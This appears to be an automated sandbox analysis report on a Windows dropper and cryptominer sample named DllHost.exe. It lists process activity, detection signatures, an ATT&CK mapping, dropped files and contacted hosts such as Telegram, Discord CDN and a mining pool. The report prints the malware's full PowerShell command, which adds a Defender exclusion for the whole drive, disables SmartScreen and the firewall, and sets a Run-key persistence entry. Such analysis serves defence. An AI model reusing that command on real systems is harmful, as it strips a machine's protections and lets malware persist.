Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191EC840 cpuid 0_2_00007FF7191EC840
Source: C:\ProgramData\MicrosoftNetwork\System.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191D316C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7191D316C
Source: C:\Users\user\Desktop\DllHost.exeCode function: 0_2_00007FF7191ED444 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7191ED444
Source: C:\ProgramData\UpSys.exeCode function: 44_2_00000001400850DC GetUserNameW,44_2_00000001400850DC
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140012EB0 GetVersionExW,GetCurrentProcess,GetSystemInfo,FreeLibrary,GetSystemInfo,44_2_0000000140012EB0

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Modifies the windows firewall
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: procexp.exe, 00000004.00000002.315942522.000002747DEB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume4\ProgramData\Systemd\procexp.exe
Source: System.exe, 0000000B.00000000.351308203.0000023FB1F83000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000000.358129624.0000023FB3C20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\ProgramData\Systemd\procexp.exe
Source: DllHost.exe, 00000000.00000002.428554138.00000208C975A000.00000004.00000020.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.348922341.00000208C9B30000.00000004.00000800.00020000.00000000.sdmp, DllHost.exe, 00000000.00000003.276233379.00000208C971B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
Source: UpSys.exe, 0000002C.00000000.346760783.0000000140097000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance1, 0, 0, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonewstrbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoublehwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32PowerRun:v1.5%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
Source: UpSys.exeBinary or memory string: WIN_XP
Source: UpSys.exeBinary or memory string: WIN_XPe
Source: UpSys.exeBinary or memory string: WIN_VISTA
Source: UpSys.exeBinary or memory string: WIN_7
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140088520 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,44_2_0000000140088520
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014008FAD0 OleInitialize,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,44_2_000000014008FAD0
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140076D20 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,44_2_0000000140076D20

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
2
Valid Accounts		11
Windows Management Instrumentation		1
DLL Side-Loading		1
Exploitation for Privilege Escalation		42
Disable or Modify Tools		11
Input Capture		2
System Time Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium1
Web Service		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default Accounts1
Native API		2
Valid Accounts		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		LSASS Memory1
Account Discovery		Remote Desktop Protocol11
Input Capture		Exfiltration Over Bluetooth2
Ingress Tool Transfer		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
Command and Scripting Interpreter		1
Windows Service		2
Valid Accounts		2
Obfuscated Files or Information		Security Account Manager3
File and Directory Discovery		SMB/Windows Admin Shares2
Clipboard Data		Automated Exfiltration11
Encrypted Channel		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)2
Registry Run Keys / Startup Folder		21
Access Token Manipulation		1
DLL Side-Loading		NTDS47
System Information Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer2
Non-Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon Script1
Windows Service		1
File Deletion		LSA Secrets1
Query Registry		SSHKeyloggingData Transfer Size Limits13
Application Layer Protocol		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.common112
Process Injection		111
Masquerading		Cached Domain Credentials261
Security Software Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup Items2
Registry Run Keys / Startup Folder		2
Valid Accounts		DCSync141
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job141
Virtualization/Sandbox Evasion		Proc Filesystem3
Process Discovery		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)21
Access Token Manipulation		/etc/passwd and /etc/shadow11
Application Window Discovery		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)112
Process Injection		Network Sniffing1
System Owner/User Discovery		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
Remote System Discovery		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
System Network Configuration Discovery		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 658699 Sample: DllHost.exe Startdate: 07/07/2022 Architecture: WINDOWS Score: 100 108 Snort IDS alert for network traffic 2->108 110 Malicious sample detected (through community Yara rule) 2->110 112 Multi AV Scanner detection for submitted file 2->112 114 5 other signatures 2->114 11 DllHost.exe 41 2->11         started        16 System.exe 19 2->16         started        18 svchost.exe 2->18         started        20 13 other processes 2->20 process3 dnsIp4 94 api.telegram.org 149.154.167.220, 443, 49739, 49765 TELEGRAMRU United Kingdom 11->94 96 cdn.discordapp.com 162.159.134.233, 443, 49746, 49754 CLOUDFLARENETUS United States 11->96 106 2 other IPs or domains 11->106 78 C:\ProgramData\UpSys.exe, PE32+ 11->78 dropped 80 C:\ProgramData\Systemd\procexp.exe, PE32+ 11->80 dropped 82 C:\ProgramData\MicrosoftNetwork\System.exe, PE32+ 11->82 dropped 86 2 other files (1 malicious) 11->86 dropped 126 System process connects to network (likely due to code injection or exploit) 11->126 128 May check the online IP address of the machine 11->128 130 Modifies the windows firewall 11->130 22 procexp.exe 11->22         started        26 powershell.exe 30 11->26         started        28 WerFault.exe 11->28         started        37 13 other processes 11->37 98 3.220.57.224, 443, 49763 AMAZON-AESUS United States 16->98 100 api.ipify.org 16->100 84 C:\ProgramData\Systemd\old.exe (copy), PE32+ 16->84 dropped 132 Multi AV Scanner detection for dropped file 16->132 134 Machine Learning detection for dropped file 16->134 136 Adds a directory exclusion to Windows Defender 16->136 31 powershell.exe 16->31         started        33 cmd.exe 16->33         started        39 3 other processes 16->39 138 Changes security center settings (notifications, updates, antivirus, firewall) 18->138 35 MpCmdRun.exe 18->35         started        102 127.0.0.1 unknown unknown 20->102 104 192.168.2.1 unknown unknown 20->104 41 2 other processes 20->41 file5 signatures6 process7 dnsIp8 90 131.153.56.98, 49760, 80 CWIEUS United States 22->90 92 pool.hashvault.pro 22->92 118 Antivirus detection for dropped file 22->118 120 Query firmware table information (likely to detect VMs) 22->120 122 Machine Learning detection for dropped file 22->122 124 Uses netsh to modify the Windows network and firewall settings 26->124 43 UpSys.exe 26->43         started        53 2 other processes 26->53 88 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 28->88 dropped 45 UpSys.exe 31->45         started        55 2 other processes 31->55 57 2 other processes 33->57 47 conhost.exe 35->47         started        49 conhost.exe 37->49         started        59 17 other processes 37->59 51 conhost.exe 39->51         started        file9 signatures10 process11 process12 61 UpSys.exe 43->61         started        63 UpSys.exe 45->63         started        process13 65 UpSys.exe 61->65         started        67 UpSys.exe 63->67         started        process14 69 powershell.exe 65->69         started        72 powershell.exe 67->72         started        signatures15 116 Creates files in the system32 config directory 69->116 74 conhost.exe 69->74         started        76 conhost.exe 72->76         started        process16

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
DllHost.exe19%VirustotalBrowse
DllHost.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\ProgramData\Systemd\procexp.exe100%AviraHEUR/AGEN.1203240
C:\ProgramData\Systemd\procexp.exe100%Joe Sandbox ML
C:\ProgramData\MicrosoftNetwork\System.exe100%Joe Sandbox ML
C:\ProgramData\MicrosoftNetwork\System.exe26%ReversingLabsWin64.Dropper.Scrop
C:\ProgramData\UpSys.exe0%MetadefenderBrowse
C:\ProgramData\UpSys.exe5%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\UpSys[1].exe0%MetadefenderBrowse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\UpSys[1].exe5%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://crl.mi-0%Avira URL Cloudsafe
https://contoso.com/License0%URL Reputationsafe
http://schemas.microsoft.c0%URL Reputationsafe
http://crl.osofts/Microt00%URL Reputationsafe
http://schemas.xm0%Avira URL Cloudsafe
https://contoso.com/0%URL Reputationsafe
http://logo.v0%Avira URL Cloudsafe
https://www.lobalsign.com/ro0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://xmrig.com/wizard%s0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://crl.ver)0%Avira URL Cloudsafe
https://xmrig.com/wizard0%URL Reputationsafe
https://%s.xboxlive.com0%URL Reputationsafe
https://dynamic.t0%URL Reputationsafe
https://xmrig.com/docs/algorithms0%URL Reputationsafe
https://xmrig.com/benchmark/%s0%URL Reputationsafe
https://%s.dnet.xboxlive.com0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
api.ipify.org.herokudns.com
52.20.78.240
truefalse
    		high
    cdn.discordapp.com
    		162.159.134.233
